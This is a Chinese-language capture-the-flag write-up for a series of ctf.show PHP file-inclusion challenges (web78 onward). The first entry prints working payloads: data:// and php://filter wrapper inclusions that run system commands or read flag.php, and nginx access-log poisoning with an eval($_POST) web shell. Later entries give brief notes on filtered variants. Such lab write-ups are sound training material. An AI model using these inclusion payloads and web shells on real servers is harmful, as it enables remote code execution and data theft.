ctf.show之文件包含

web78:  文件包含系列开始 

题解:   

        本题没有过滤，所以有三种方法: 

               1.data伪协议(推荐，可以使用ls命令查看flag位置 )

                        ？file=data://text/plain,<?php system("ls")?>

                        ?  file=data://text/plain,<?php system("tac flag.php")?>

                2.filter伪协议(不推荐，不知道flag在哪时不好用)

                        ？file=php://filter/convert.base64-encode/resource=flag.php

                3.日志包含(推荐，伟大无需多言)

                        ?file= ../../../../var/log/nginx/access.log

                        <?php eval($_POST[a]);?>

web79: 文件包含系列开始

因为此题过滤了php，则我们用"=" 来代替这个php即可，如上图所示得到flag。

web80: 文件包含系列开始 

此题，由于伪协议不能用，那我们就用日志包含即可，先抓取包，在UA里面输入代码，如下图所示：

上传成功了，最后在通过日志来找flag。如下图所示: 

你执行就会得到flag，不过这并不是flag.php，而是fl0g.php，因此我们需要在此之前，需要通过命令1=system('ls'); 查看一下到底有哪些文件。

web81: 昨晚这道题，你就已经经历了九九八十一难，后面还有919难，加油吧，少年！

此题，比前一题多过滤了一个冒号，对我们的日志包含，并不影响，因此，仍然可以用上一题来解

web82: 竞争环境需要晚上11点30分至次日7时30分之间做，其他时间不开放竞争条件

既然题目都这么说了，那么我们就用条件竞争来解决。

web87: 继续秀